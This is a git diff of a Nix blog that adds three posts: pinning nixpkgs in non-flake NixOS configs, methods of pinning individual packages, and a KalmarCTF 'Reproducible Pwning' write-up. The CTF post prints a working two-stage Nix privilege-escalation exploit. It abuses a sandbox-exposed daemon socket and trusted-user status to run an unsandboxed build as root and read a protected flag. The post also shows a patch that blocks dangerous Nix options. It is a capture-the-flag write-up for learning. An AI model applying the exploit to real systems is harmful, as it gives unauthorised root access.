+ +For context, *by default*, on NixOS 24.05 and later, due to [PR +254405](https://github.com/NixOS/nixpkgs/pull/254405), *flake*-based NixOS +configs get pinned `<nixpkgs>` and a pinned `nixpkgs` flake of the exact same +version as the running system, such that `nix-shell -p hello` and `nix run +nixpkgs#hello` give you the same `hello` every time: it will always be the same +one as if you put it in `systemPackages`. That setup works by setting +`NIX_PATH` to refer to the flake registry `/etc/nix/registry.json`, which then +is set to resolve `nixpkgs` to `/nix/store/xxx-source`, that is, the nixpkgs of +the current configuration. + +We can bring the same niceness to non-flake configurations, with the exact same +code behind it, even! + +Let's fix the `NIX_PATH`. Add this module's worth of code into your config +somewhere, say, `pinning.nix`, then add it to `imports` of `configuration.nix`: + +```nix +{ config, pkgs, ... }: +let sources = import ./npins; +in { + # We need the flakes experimental feature to do the NIX_PATH thing cleanly + # below. Given that this is literally the default config for flake-based + # NixOS installations in the upcoming NixOS 24.05, future Nix/Lix releases + # will not get away with breaking it. + nix.settings = { + experimental-features = "nix-command flakes"; + }; + + # FIXME(24.05 or nixos-unstable): change following two rules to + # + # nixpkgs.flake.source = sources.nixpkgs; + # + # which does the exact same thing, using the same machinery as flake configs + # do as of 24.05. + nix.registry.nixpkgs.to = { + type = "path"; + path = sources.nixpkgs; + }; + nix.nixPath = ["nixpkgs=flake:nixpkgs"]; +} +``` + +# New workflow + +When you want to update NixOS, use `npins update`, then `./rebuild.sh` +(`./rebuild.sh dry-build` to check it evaluates, `./rebuild.sh boot` to switch +on next boot, etc). If it works, commit it to Git. The version of nixpkgs comes +from exactly one place now, and it is tracked along with the changes to your +configuration.
Builds are faster now since we don't evaluate the configuration +multiple times. + +Multiple machines can no longer get desynchronized with each other. Config +commits *will* build to the same result in the future, since they are +self-contained now. + +# Conclusion and analysis + +We really need to improve `nixos-rebuild` as the NixOS development community. +It embodies, at basically every juncture, obsolescent practices that confuse +users and waste time. Modern configurations should be using either +npins/equivalent or flakes, both of which should be equally valid and easy to +use choices in all our tooling. + +Flags like `--no-build-nix` come from an era where people were building +flake-based configs from a Nix that didn't even *have* flakes, so they needed +to be able to switch to an entirely different *Nix* to be able to evaluate +their config. We should never be rebuilding Nix by default before re-evaluating +the configuration in 2024. The Nix language is much, much more stable these +days, almost frozen like a delicious ice cream cone, and so the idea of +someone's config requiring a brand new Nix to merely evaluate is bordering on +absurd. + +It doesn't help that this old flakes hack actually breaks cross compiling +NixOS configs, for which `--fast` is thus mandatory. The re-execution of +`nixos-rebuild` is more excusable since there is [still work to do on that like +capturing output to the journal](https://github.com/NixOS/nixpkgs/pull/287968), +but it is still kind of bothersome to eat so much evaluation time about it; I +wonder if a happier medium is that it would just build `pkgs.nixos-rebuild` +instead of evaluating all the modules, but that has its own drawback of ignoring +overlays in the NixOS config...
+ +Another tool that [needs rewriting, documentedly +so](https://github.com/NixOS/nixpkgs/issues/293543) is `nixos-option`, which is +a bad pile of C++ that doesn't support flakes, and which could be altogether +replaced by a short bit of very normal Nix code and a shell script. + +There's a lot of work still to do on making NixOS and Nix a more friendly +toolset, and we hope you can join us. I (Jade) have been working along with +several friends on Lix, a soon-to-be-released fork of CppNix +2.18 focused on friendliness, stability, and future evolution. People +in our community have been working on these UX problems outside Nix itself +as well. We would love for these tools to be better for everyone. diff --git a/content/posts/pinning-packages-in-nix.md b/content/posts/pinning-packages-in-nix.md new file mode 100644 index 0000000..fa393d6 --- /dev/null +++ b/content/posts/pinning-packages-in-nix.md @@ -0,0 +1,310 @@ ++++ +date = "2024-05-19" +draft = false +path = "/blog/pinning-packages-in-nix" +tags = ["nix"] +title = "Pinning packages in Nix" ++++ + +Although Nix supposedly makes pinning things easy, it really does not seem so +from a perspective of looking at other software using pinning: it is not +possible to simply write `package = "^5.0.1"` in some file somewhere and get +*one* package pinned at a specific version. Though this is frustrating, there +is a reason for this, and it primarily speaks to how nixpkgs is a Linux +distribution and how Nix is unlike a standard language package manager. + +This post will go through the ways to pin a package to some older version and +why one would use each method. + +# Simply add an older version of nixpkgs + +> Software regressed? No patches in master to fix it? Try 30-40 different + versions of nixpkgs. An easy weeknight bug fix. You will certainly not regret + pinning 30-40 versions of nixpkgs. + +Unlike most systems, it is fine to mix versions of nixpkgs, although it will +likely go wrong if, e.g.
libraries are intermingled between versions (*in +particular*, it is inadvisable to replace some program with a version +from a different nixpkgs from within an overlay for this reason). But, if one +package is all that is necessary, one can in fact simply import another version +of nixpkgs. + +This works because binaries from multiple versions of nixpkgs can coexist +on a computer and simply work. However, it can go wrong if they are loading +libraries at runtime, especially if the glibc version changes, especially if +`LD_LIBRARY_PATH` is involved. That failure mode is, however, rather loud and +obvious if it happens. + +For example: + +```nix +let + pkgs1Src = builtins.fetchTarball { + # https://github.com/nixos/nixpkgs/tree/nixos-23.11 + url = "https://github.com/nixos/nixpkgs/archive/219951b495fc2eac67b1456824cc1ec1fd2ee659.tar.gz"; + sha256 = "sha256-u1dfs0ASQIEr1icTVrsKwg2xToIpn7ZXxW3RHfHxshg="; + name = "source"; + }; + + pkgs2Src = fetchTarball { + # https://github.com/nixos/nixpkgs/tree/nixos-unstable + url = "https://github.com/nixos/nixpkgs/archive/d8fe5e6c92d0d190646fb9f1056741a229980089.tar.gz"; + sha256 = "sha256-iMUFArF0WCatKK6RzfUJknjem0H9m4KgorO/p3Dopkk="; + name = "source"; + }; + + pkgs1 = import pkgs1Src { }; + pkgs2 = import pkgs2Src { }; + +in +{ + env = pkgs1.buildEnv { + name = "env"; + paths = [ pkgs1.vim pkgs2.hello ]; + }; + + vim1 = pkgs1.vim; + vim2 = pkgs2.vim; +} +``` + +Here we have an environment which is being built out of packages from two +different versions of nixpkgs, so that `result/bin/hello` is from `pkgs2` and +`result/bin/vim` is from `pkgs1`. This can equivalently be done for +`environment.systemPackages` or similar such things: to get another version of +nixpkgs into a NixOS configuration, one can: + +- For flakes, one can inject the dependency [in some manner suggested by + "Flakes aren't real"][flakes-arent-real]. Or, one can do the + `builtins.fetchTarball` thing above. 
+- For non-flakes, one can do the `builtins.fetchTarball` thing shown above, or + add another input in [`npins`][npins]/Niv/etc, or add a second channel + (though we suggest migrating NixOS configs using channels to npins or + flakes so that the nixpkgs version is tracked in git). + +[flakes-arent-real]: https://jade.fyi/blog/flakes-arent-real/ +[npins]: https://github.com/andir/npins + +``` + » nix-build -A env /tmp/meow.nix +/nix/store/zilav8lqqgfgrk54wg88mdwq582hqdp9-env + +~ » ./result/bin/hello --version | head -n1 +hello (GNU Hello) 2.12.1 + + » ./result/bin/vim --version | head -n3 +VIM - Vi IMproved 9.0 (2022 Jun 28, compiled Jan 01 1980 00:00:00) +Included patches: 1-2116 +Compiled by nixbld + + » nix eval -f /tmp/meow.nix vim1.version +"9.0.2116" + + » nix eval -f /tmp/meow.nix vim2.version +"9.1.0148" +``` + +
+
Difficulty
+
Very easy
+
Rebuilds
+
+None, but will bring in another copy of nixpkgs and any dependencies (and +transitive dependencies). +
+
+ +# Vendor the package + +Another way to pin one package is to vendor the package definition of the +relevant version. The easiest way to do this is to find the version of nixpkgs +with the desired package version and then copy the `package.nix` or +`default.nix` or such into your own project, and then call it with +`callPackage`. + +You can find it with something like: + +``` + » nix eval --raw -f '<nixpkgs>' hello.meta.position +/nix/store/0qd773b63yg8435w8hpm13zqz7iipcbs-source/pkgs/by-name/he/hello/package.nix:41 +``` + +Or, equivalently, with `nix repl -f '<nixpkgs>'`, `:e hello` or to do the same +as above, `hello.meta.position`. + +Then, vendor that file into your configurations repository. + +Once it is vendored, it can be used either from an overlay: + +```nix +final: prev: { + hello = final.callPackage ./hello-vendored.nix { }; +} +``` + +or directly in your use site: + +```nix +{ pkgs, ... }: { + environment.systemPackages = [ + (pkgs.callPackage ./hello-vendored.nix { }) + ]; +} +``` + + +
+
Difficulty
+
Slight effort
+
Rebuilds
+
+For the overlay use case, this will build the overridden package and anything +depending on it. For the direct at use site case, this will just rebuild the +package, and anything depending on it will get the version in upstream nixpkgs. +
+
+ +# Patch the package with overrides + +nixpkgs offers several separate methods to "override" things that mean +different things. In short: + +- [`somePackage.override`][override] replaces the dependencies of a package; + more specifically the dependencies injected by `callPackage`. It accepts an + attribute set but can also accept a lambda of one argument, providing the + previous dependencies of the package. +- [`somePackage.overrideAttrs`][overrideAttrs] replaces the `stdenv.mkDerivation` + arguments of a package. This lets you replace the `src` of a package, in + principle. +- [`overrideCabal`][overrideCabal] replaces the `haskellPackages.mkDerivation` + arguments for a Haskell package in a similar way that `overrideAttrs` does for + `stdenv.mkDerivation`. This is internally implemented by methods equivalent + to the evil crimes below. + +[override]: https://nixos.org/manual/nixpkgs/stable/#sec-pkg-override +[overrideAttrs]: https://nixos.org/manual/nixpkgs/stable/#sec-pkg-overrideAttrs +[overrideCabal]: https://nixos.org/manual/nixpkgs/stable/#haskell-overriding-haskell-packages + +Here are some examples: + +Build an openttd with a different upstream source by putting this in +`openttd-jgrpp.nix`: + +```nix +{ openttd, fetchFromGitHub }: +openttd.overrideAttrs (old: { + src = fetchFromGitHub { + owner = "jgrennison"; + repo = "openttd-patches"; + rev = "jgrpp-0.57.1"; + sha256 = "sha256-mQy+QdhEXoM9wIWvSkMgRVBXJO1ugXWS3lduccez1PQ="; + }; +}) +``` + +then `pkgs.callPackage ./openttd-jgrpp.nix { }`. + +For instance, the following (rather silly) command will build such a file: + +``` + » nix build -L --impure --expr 'with import <nixpkgs> {}; callPackage ./openttd-jgrpp.nix {}' +``` + +## Limitations + +Most notably, [overrideAttrs doesn't work][overrideAttrs-busted] on several +significant language ecosystems including Rust and Go, since one almost always +needs to override the arguments of `buildRustPackage` or `buildGoPackage` when +replacing something.
For these, either one can do crimes to introduce an +`overrideRust` function (see below), or one can cry briefly and then vendor the +package. The latter is easier. + +```nix +let + pkgs = import <nixpkgs> { }; + # Give the package a fake buildRustPackage from callPackage that modifies the + # arguments through a function. + overrideRust = f: drv: drv.override (oldArgs: + let rustPlatform = oldArgs.rustPlatform or pkgs.rustPlatform; + in oldArgs // { + rustPlatform = rustPlatform // { + buildRustPackage = args: rustPlatform.buildRustPackage (f args); + }; + }); + + # Take some arguments to buildRustPackage and make new ones. In this case, + # override the version and the hash + evil = oldArgs: oldArgs // { + src = oldArgs.src.override { + rev = "v0.20.9"; + sha256 = "sha256-NxWqpMNwu5Ajffw1E2q9KS4TgkCH6M+ctFyi9Jp0tqQ="; + }; + version = "master"; + # FIXME: if you are actually doing this put a real hash here + cargoSha256 = pkgs.lib.fakeHash; + }; + +in +{ + x = overrideRust evil pkgs.tree-sitter; +} +``` + +[overrideAttrs-busted]: https://github.com/NixOS/nixpkgs/issues/99100 + +Then: `nix build -L -f evil.nix x` + +
+
Difficulty
+
Highly variable, sometimes trivial, sometimes nearly impossible, depending +on architectural flaws of nixpkgs.
+
Rebuilds
+
+For the overlay use case of actually using this overridden package, this will +build the overridden package and anything depending on it. For the direct at +use site case, this will just rebuild the package, and anything depending on it +will get the version in upstream nixpkgs. +
+
+ +# Patch a NixOS module + +If one wants to replace a NixOS module, say, by getting it from a later version +of nixpkgs, see [Replacing Modules] in the NixOS manual. + +[Replacing Modules]: https://nixos.org/manual/nixos/stable/#sec-replace-modules + +# Patch the base system without a world rebuild + +It's possible to replace an entire store path with another inside a NixOS +system without rebuilding the world (but wasting some space (by duplicating +things for the rewritten version) and being somewhat evil/potentially unsound +since it is just a text replacement of the hashes). This can be achieved with +the NixOS option +[`system.replaceRuntimeDependencies`][replaceRuntimeDependencies]. + +[replaceRuntimeDependencies]: https://nixos.org/manual/nixos/stable/options#opt-system.replaceRuntimeDependencies + +# Why do we need all of this? + +The primary reason that Nix doesn't allow trivially overriding packages with a +different version is that it is a generalized build system building software +that has non-uniform expectations of how to be built. One can indeed see +that the "replace one version with some other in some file" idea is *almost* +reality in languages that use `mkDerivation` directly, though one might have to +tweak other build properties sometimes. Architectural problems in nixpkgs +prevent this working for several ecosystems, though. + +Another sort of issue is that nixpkgs tries to provide a mostly [globally +coherent] set of software versions, where, like most Linux distributions, there +is generally one blessed version of a library with some exceptions. This is, in +fact, mandatory to be able to have any cache hits as a hermetic build system: +if everyone was building slightly different versions of libraries, all +downstream packages will have different hashes and thus miss the cache. 
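
The cache-miss argument can be made concrete with a toy model. This is only a sketch and assumes nothing about Nix's real store path algorithm: `pkg_hash` is a made-up helper that hashes a package's name, version, and the hashes of its dependencies with `sha256sum` (so it assumes GNU coreutils), and `libfoo`/`app` are hypothetical packages.

```bash
#!/usr/bin/env bash
# Toy model of input-addressed hashes (NOT Nix's actual algorithm): a
# package's hash is derived from its name, its version, and the hashes of
# its dependencies, so a change in one library ripples into everything
# built on top of it.

# pkg_hash NAME VERSION [DEP_HASH...] -> prints a short hex digest
pkg_hash() {
  printf '%s\n' "$@" | sha256sum | cut -c1-12
}

# Everyone builds against the one blessed libfoo 1.0.
libfoo_a=$(pkg_hash libfoo 1.0)
app_a=$(pkg_hash app 2.3 "$libfoo_a")

# Someone pins libfoo 1.0.1 just for themselves; app itself is unchanged.
libfoo_b=$(pkg_hash libfoo 1.0.1)
app_b=$(pkg_hash app 2.3 "$libfoo_b")

echo "app built against libfoo 1.0:   $app_a"
echo "app built against libfoo 1.0.1: $app_b"
```

The two `app` digests differ even though `app` stayed at the same version, which is the sense in which a per-package pin turns every downstream package into a cache miss.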
+ +So, in a way, a software distribution based on Nix cannot have separate locking +for every package and simultaneously have functional caches: the moment that +everything is not built together, caches will miss. + +[globally coherent]: https://www.haskellforall.com/2022/05/the-golden-rule-of-software.html + diff --git a/content/posts/reproducible-pwning-writeup.md b/content/posts/reproducible-pwning-writeup.md new file mode 100644 index 0000000..12a402c --- /dev/null +++ b/content/posts/reproducible-pwning-writeup.md @@ -0,0 +1,295 @@ ++++ +date = "2024-03-16" +draft = false +path = "/blog/reproducible-pwning-writeup" +tags = ["ctf", "nix"] +title = "KalmarCTF: Reproducible Pwning writeup" ++++ + +I was making memes in the CTF room until someone told me Nix showed up +on a CTF, and well. It doesn't take that much to tempt me. + +Reproducible Pwning is a challenge written by +[niko](https://hachyderm.io/@nrab), which involves a NixOS VM you're supposed +to root. The build user is not notably privileged. + +There is a flag in `/data` which is mounted from the host via some means. That +directory is only readable by root. + +There is a patch to the Nix evaluator. 
Interesting: + +```patch +diff --git a/src/libutil/config.cc b/src/libutil/config.cc +index 37f5b50c7..fd824ee03 100644 +--- a/src/libutil/config.cc ++++ b/src/libutil/config.cc +@@ -1,3 +1,4 @@ ++#include "logging.hh" + #include "config.hh" + #include "args.hh" + #include "abstract-setting-to-json.hh" +@@ -17,6 +18,16 @@ Config::Config(StringMap initials) + + bool Config::set(const std::string & name, const std::string & value) + { ++ if (name.find("build-hook") != std::string::npos ++ || name == "accept-flake-config" ++ || name == "allow-new-privileges" ++ || name == "impure-env") { ++ logWarning({ ++ .msg = hintfmt("Option '%1%' is too dangerous, skipping.", name) ++ }); ++ return true; ++ } ++ + bool append = false; + auto i = _settings.find(name); + if (i == _settings.end()) { +``` + +The machine is configured with the following NixOS module, which I pulled out +of the included flake. The rest of the flake is normal stuff. There are a few +things that stand out to me: + +- sudo is disabled, polkit is disabled: we are probably not looking for some + setuid exploit +- There are some *extremely* nonstandard Nix config settings being applied + +```nix +({pkgs, ...}: { + nixpkgs.hostPlatform = "x86_64-linux"; + nixpkgs.overlays = [ + (final: prev: { + # JADE: likely vulnerable to puck's CVE, but I doubt that is the bug cuz they + # added a patch and there is other funny business up. + nix = final.nixVersions.nix_2_13.overrideAttrs { + patches = [./nix.patch]; + # JADE: due to broken integration tests, almost certainly + doInstallCheck = false; + }; + }) + ]; + + # JADE: no interesting setuid binaries + security = { + sudo.enable = false; + polkit.enable = false; + }; + + systemd.services.nix-daemon.serviceConfig.EnvironmentFile = let + # JADE: here is the wacky part of the config. + # This exposes the Nix daemon socket inside the sandbox (this is mostly + # never the case unless using recursive-nix). 
So we are going to + # be running a nix build inside a nix build to do something. + sandbox = pkgs.writeText "nix-daemon-config" '' + extra-sandbox-paths = /tmp/daemon=/nix/var/nix/daemon-socket/socket + ''; + # JADE: I don't know what this does, so we are going to be reading some C++Nix + # source code. But it sure smells like running the build as root. + buildug = pkgs.writeText "nix-daemon-config" '' + build-users-group = + ''; + in + # JADE: Sets additional config files to only the nix daemon. This is + # documented in the Nix manual. + pkgs.writeText "env" '' + NIX_USER_CONF_FILES=${sandbox}:${buildug} + ''; +}) +``` + +Here is the rest of the module which is uninteresting: + +{% codesample(desc="`boring-module.nix`") %} +```nix +{ ... }: { + # JADE: what the heck is this? It seems like some kind of kernel-problems + # storage thing. Later found out this is nothing. + environment.etc."systemd/pstore.conf".text = '' + [PStore] + Unlink=no + ''; + + users.users.root.initialHashedPassword = "x"; + users.users.user = { + isNormalUser = true; + initialHashedPassword = ""; + group = "user"; + }; + users.groups.user = {}; + + system.stateVersion = "22.04"; + + services.openssh = { + enable = true; + settings.PermitRootLogin = "no"; + }; + + # JADE: save some image size + environment.noXlibs = true; + documentation.man.enable = false; + documentation.doc.enable = false; + fonts.fontconfig.enable = false; + + nix.settings = { + # JADE: this option has no interesting security impact, just whether you + # can build during evaluation phase. + allow-import-from-derivation = false; + experimental-features = ["flakes" "nix-command" "repl-flake" "no-url-literals"]; + }; +} +``` +{% end %} + +So, to sum up: +- We have a Nix daemon socket in the sandbox. +- We are running builds with some weird group. +- Several config settings that make trusted users effectively root are + blocked by the patch. Interesting. We probably become a trusted user then. 
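
To get a feel for how narrow that blocklist is, here is the check from the patch restated as a shell function. It is a sketch of the predicate only, not the patched code: `is_blocked` is a name made up for this example, and the option names fed to it are just samples.

```bash
#!/usr/bin/env bash
# Restatement of the condition added to Config::set by the patch: an option
# is skipped if its name contains "build-hook" or is exactly one of three
# other names. Returns 0 for "blocked", 1 for "passes through".
is_blocked() {
  case "$1" in
    *build-hook*|accept-flake-config|allow-new-privileges|impure-env)
      return 0 ;;
    *)
      return 1 ;;
  esac
}

for opt in build-hook post-build-hook pre-build-hook impure-env max-jobs sandbox; do
  if is_blocked "$opt"; then
    echo "$opt: blocked"
  else
    echo "$opt: passes through"
  fi
done
```

Anything that is not on that short list is still settable by whoever the daemon trusts.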
+ +So like, let's run some build. + +```nix +let + nixpkgs = builtins.fetchTarball { + url = "https://github.com/nixos/nixpkgs/archive/6e2f00c83911461438301db0dba5281197fe4b3a.tar.gz"; + "sha256" = "sha256:0bsw31zhnnqadxh2i2fgj9568gqabni3m0pfib806nc2l7hzyr1h"; + }; + pkgs = import nixpkgs {}; +in +pkgs.runCommand "meow" { buildInputs = [ pkgs.nixVersions.nix_2_13 ]; PKGS = pkgs.path; } '' + id -a +'' +``` + +This gives me: + +``` +this derivation will be built: + /nix/store/958afc87nsfhwlm6b62z2xksmlaawsqg-meow.drv +building '/nix/store/958afc87nsfhwlm6b62z2xksmlaawsqg-meow.drv'... +uid=1000(nixbld) gid=100(nixbld) groups=100(nixbld) +``` + +Hm. Boring, I was expecting to be root already. + +But, why is there a socket in there? Let's try invoking another build inside +our build, maybe? And, based on the assumption we must be trusted user (since I +can't think of any other reason interaction with the bind-mounted socket would +be different from inside the sandbox), let's try just turning off the sandbox +in the inner build and see what happens? + +```nix +let + nixpkgs = builtins.fetchTarball { + url = "https://github.com/nixos/nixpkgs/archive/6e2f00c83911461438301db0dba5281197fe4b3a.tar.gz"; + "sha256" = "sha256:0bsw31zhnnqadxh2i2fgj9568gqabni3m0pfib806nc2l7hzyr1h"; + }; + pkgs = import nixpkgs {}; + # dont worry about the contents quite yet + hax = pkgs.writeText "hax" (builtins.readFile ./stage2.nix); +in +pkgs.runCommand "meow" { buildInputs = [ pkgs.nixVersions.nix_2_13 ]; PKGS = pkgs.path; } '' + id -a + nix-build --option sandbox false --extra-experimental-features 'flakes nix-command' --store unix:///tmp/daemon ${hax} +'' +``` + +and `stage2.nix`: + +```nix +let + pkgs = import (builtins.getEnv "PKGS") { }; +in +pkgs.runCommand "meow2" { } '' + echo MEOW2 + id -a +'' +``` + +This outputs: + +``` +this derivation will be built: + /nix/store/iynjhk5a5ymp26cbyp22l15ix4lrp2f6-meow.drv +building '/nix/store/iynjhk5a5ymp26cbyp22l15ix4lrp2f6-meow.drv'... 
+uid=1000(nixbld) gid=100(nixbld) groups=100(nixbld) +this derivation will be built: + /nix/store/cyw7kaqazdpgpna0jmaw7cw5348srvv3-meow2.drv +building '/nix/store/cyw7kaqazdpgpna0jmaw7cw5348srvv3-meow2.drv'... +MEOW2 +uid=0(root) gid=0(root) groups=0(root) +``` + +Welp, I am root. Change stage 2 to `cat /data/*` and we have a flag: + +``` +[user@nixos:~]$ cat >stage1.nix <<-'EOF' +> let + nixpkgs = builtins.fetchTarball { + url = "https://github.com/nixos/nixpkgs/archive/6e2f00c83911461438301db0dba5281197fe4b3a.tar.gz"; + "sha256" = "sha256:0bsw31zhnnqadxh2i2fgj9568gqabni3m0pfib806nc2l7hzyr1h"; + }; + pkgs = import nixpkgs {}; + hax = pkgs.writeText "hax" (builtins.readFile ./stage2.nix); +in +pkgs.runCommand "meow" { buildInputs = [ pkgs.nixVersions.nix_2_13 ]; PKGS = pkgs.path; } '' + id -a + nix-build --option sandbox false --extra-experimental-features 'flakes nix-command' --store unix:///tmp/daemon ${hax} +'' +> EOF + +[user@nixos:~]$ cat >stage2.nix <<-'EOF' +> let + pkgs = import (builtins.getEnv "PKGS") { }; +in +pkgs.runCommand "meow2" { } '' + echo MEOW2 + id -a + ls / || true + ls /data || true + cat /data/* +'' +> EOF + +[user@nixos:~]$ nix-build stage1.nix +warning: Nix search path entry '/nix/var/nix/profiles/per-user/root/channels' does not exist, ignoring +these 2 derivations will be built: + /nix/store/gzniydj0mayvzs7hin3v3j1643fjzrq3-hax.drv + /nix/store/m4gjzvkjks5n1zr54cxjzmwav0g9zzj1-meow.drv +these 11 paths will be fetched (3.92 MiB download, 23.41 MiB unpacked): + +building '/nix/store/gzniydj0mayvzs7hin3v3j1643fjzrq3-hax.drv'... +warning: Option 'accept-flake-config' is too dangerous, skipping. +warning: Option 'allow-new-privileges' is too dangerous, skipping. +warning: Option 'build-hook' is too dangerous, skipping. +warning: Option 'post-build-hook' is too dangerous, skipping. +warning: Option 'pre-build-hook' is too dangerous, skipping. +building '/nix/store/m4gjzvkjks5n1zr54cxjzmwav0g9zzj1-meow.drv'... 
+uid=1000(nixbld) gid=100(nixbld) groups=100(nixbld) +this derivation will be built: + /nix/store/nv5j8z6w8zw0s6gjrmajy0wn7f2azfc0-meow2.drv +warning: Option 'accept-flake-config' is too dangerous, skipping. +warning: Option 'allow-new-privileges' is too dangerous, skipping. +warning: Option 'build-hook' is too dangerous, skipping. +warning: Option 'post-build-hook' is too dangerous, skipping. +warning: Option 'pre-build-hook' is too dangerous, skipping. +building '/nix/store/nv5j8z6w8zw0s6gjrmajy0wn7f2azfc0-meow2.drv'... +MEOW2 +uid=0(root) gid=0(root) groups=0(root) +bin dev home lib64 proc run sys usr +data etc lib nix root srv tmp var +flag +kalmar{0nlyReproduc1bleMisconfigurationsH3R3} +``` + +I was informed later that I found an unintended solution, and one was not +supposed to "simply set `sandbox = false`". The intended solution was to either +use the `diff-hook` setting which is run as the daemon's user (like +`post-build-hook` and `build-hook` which were conspicuously also banned), or +abuse being root to tamper with the inputs to the derivation and overwriting +something run by a privileged user. + +I don't think the unintended solution was that bad, though, because once you +are trusted user, it is assumed in the Nix codebase that you can just root the +box. diff --git a/templates/base.html b/templates/base.html index dc1baf1..b5ec4b0 100644 --- a/templates/base.html +++ b/templates/base.html @@ -17,6 +17,8 @@ + + {{ config.title }}